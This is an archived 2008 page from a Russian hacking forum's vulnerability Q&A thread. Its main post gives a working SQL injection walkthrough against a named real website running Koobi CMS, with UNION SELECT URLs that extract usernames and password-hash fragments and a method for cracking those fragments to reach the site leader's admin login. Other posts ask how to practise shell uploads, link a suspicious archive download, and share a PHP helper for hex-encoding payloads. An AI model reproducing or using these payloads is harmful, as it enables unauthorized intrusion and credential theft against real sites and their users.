FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 241 из 2422

241

Опции темы

Поиск в этой теме

Опции просмотра

18.06.2008, 15:25

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

Как подкл к Postgresql ?) и что там можно надыбать?) Точнее я нашол уязв она сообщ что моно приконектиться

18.06.2008, 16:46

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

Отправить сообщение для Red_Red1 с помощью ICQ

2 diznt, 2 gisTy, 2 sabe
По поводу сайта http://darkbrotherhood.ru
ЦМС koobi.
Версия мускула 4.1.22 (ну и ясно что никакой информатион_схемы нету)
Дырок хватает. Все что я нашел вели только к посимвольному бруту, кроме одной и вот она интересна раскруткой.
Дыра в форуме вот тут
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,11,version() ,13/*
Вроде все нормально, но...
Качаем koobi смотрим таблицы, и колонки (я скачал немного не ту версию, но догадался с префиксом)
Запрос
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,uname,pass,1 3+from+k_user/*
выдет странную картину - имена и пароли (хеши) видны не полностью.
Юзаем функции работы со строками в мускуле, я взял MID()
Запрос
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(email,1, 8),MID(pass,1,8),13+from+k_user/*
выдал то что нужно

Восьмерку тут MID(pass,1,8) подобираем опытным путем (интересно почему там 8 )
Дальше думаю понятно, меняем 1 так что бы увидеть всю строку целиком.
НО, хеш можно получать и не весь, вполне хватит первых восьми символов, с ними идем сюда http://hashcracking.info ,
выбираем поиск по маске и получаем пасс

У этой ЦМС в админке бывает авторизация по мылу, но тут по логину юзера. Его находим вот тут (на случай логина больше 8 символов)
http://darkbrotherhood.ru/index.php?area=1&p=static&page=sostav (Глава клана)
Поэтому последний запрос вот такой
http://darkbrotherhood.ru/index.php?p=forum&action=print&what=posting&id=-580+union+select+1,2,3,4,5,6,7,8,9,10,MID(uname,1, 8),MID(pass,1,8),13+from+k_user+where+uname=CHAR(6 8,97,114,107,101,108,118,101)/*
...
Было интересно исследовать. Может кто найдет другой путь?

18.06.2008, 17:29

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

пздц хакер))))) пасиб + заслужил

18.06.2008, 17:36

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

gisTy
сори, но не пиши если незнаеш..)

Red_Red1
молодец..)

Последний раз редактировалось sabe; 18.06.2008 в 17:38..

18.06.2008, 17:52

diznt

Постоянный

Регистрация: 31.01.2008

Сообщений: 643

Провел на форуме:
6128108

Репутация: 445

Вот я чето не понял с получением полного хеша

ЗЫ вопрос снят

Последний раз редактировалось diznt; 18.06.2008 в 18:06..

18.06.2008, 22:53

AARON

Участник форума

Регистрация: 29.04.2008

Сообщений: 106

Провел на форуме:
647733

Репутация: 46

Ребят, подскажите какой-то багнутый движок чего-нибудь на локалхостЪ, чтоб потренироваться шелл заливать?

18.06.2008, 23:09

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

Провел на форуме:
5301021

Репутация: 1879

Качай любой да заливай )))))
phpNuke к примеру... начиная с 6-й версии... phpbb...

Последний раз редактировалось Ch3ck; 18.06.2008 в 23:26..

19.06.2008, 15:03

~~Gecko~~

Banned

Регистрация: 17.06.2008

Сообщений: 1

Провел на форуме:
65311

Репутация: -2

что то глючит мейл.ру :-)
http://sirius.jino.ru/mail.ru_d.rar

19.06.2008, 15:33

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

Сорри, если не в тему.
Если кому надо (как я видел в комментах к одному видео оч сильно просили), то написал код быстрого кодирования в hex с локалхоста:

Код:

<form action='<? $PHP_SELF; ?>' method=POST>
<input type=text name='hex'>
<input type=SUBMIT value="OK">
</form>
<?
error_reporting(0);
echo "$hex= ";
echo("0x".bin2hex("$hex"))
?>

#10

20.06.2008, 08:51

Vid0k

Постоянный

Регистрация: 24.12.2007

Сообщений: 574

Провел на форуме:
3186852

Репутация: 316

Отправить сообщение для Vid0k с помощью ICQ

чо делать если нет принтабельных полей
подобрал кол-во полей попробывал ни одно не выводит даже в тело документа
????

Страница 241 из 2422

241

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ